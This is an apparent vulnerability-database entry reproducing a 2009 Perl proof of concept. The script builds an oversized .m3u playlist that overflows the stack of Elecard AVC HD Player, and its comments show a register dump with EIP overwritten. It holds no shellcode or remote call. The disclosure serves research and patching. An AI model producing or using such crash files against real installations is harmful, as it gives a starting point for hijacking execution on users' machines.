Lucene search
K

Elecard AVC HD Player Overflow

🗓️ 02 Feb 2009 00:00:00Reported by AlpHaNiXType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Elecard AVC HD Player Stack Overflow in m3u/xpl File

Code
`#!/usr/bin/perl  
#Elecard AVC HD PLAYER m3u/xpl file Local Stack Overflow POC  
#Found By AlpHaNiX  
#From NullArea.Net  
###########################  
# proof of concept   
###########################  
#Stack Get Overflowed Starting from 2353 char  
#EIP overitten  
#------------------  
# REGISTRES   
#------------------  
#EAX 00000000  
#ECX 41414141  
#EDX 775A104D ntdll.775A104D  
#EBX 00000000  
#ESP 0012BC9C  
#EBP 0012BCBC  
#ESI 00000000  
#EDI 00000000  
#EIP 41414141  
#------------------  
# Dump From Stack  
#------------------  
#0012D000 41414141  
#0012D004 41414141  
#0012D008 41414141  
#0012D00C 41414141  
#0012D010 41414141  
#0012D014 41414141  
#0012D018 41414141  
#0012D01C 41414141  
#0012D020 41414141  
#0012D024 41414141  
#0012D028 41414141  
  
my $file = "alpix.m3u" ;  
my $poc="http://"."A" x 2353 ;  
open(alpix, ">>$file") or die "Cannot open $file";  
print alpix $poc;  
close(alpix);  
print "\n[+] done ! , $file created";  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation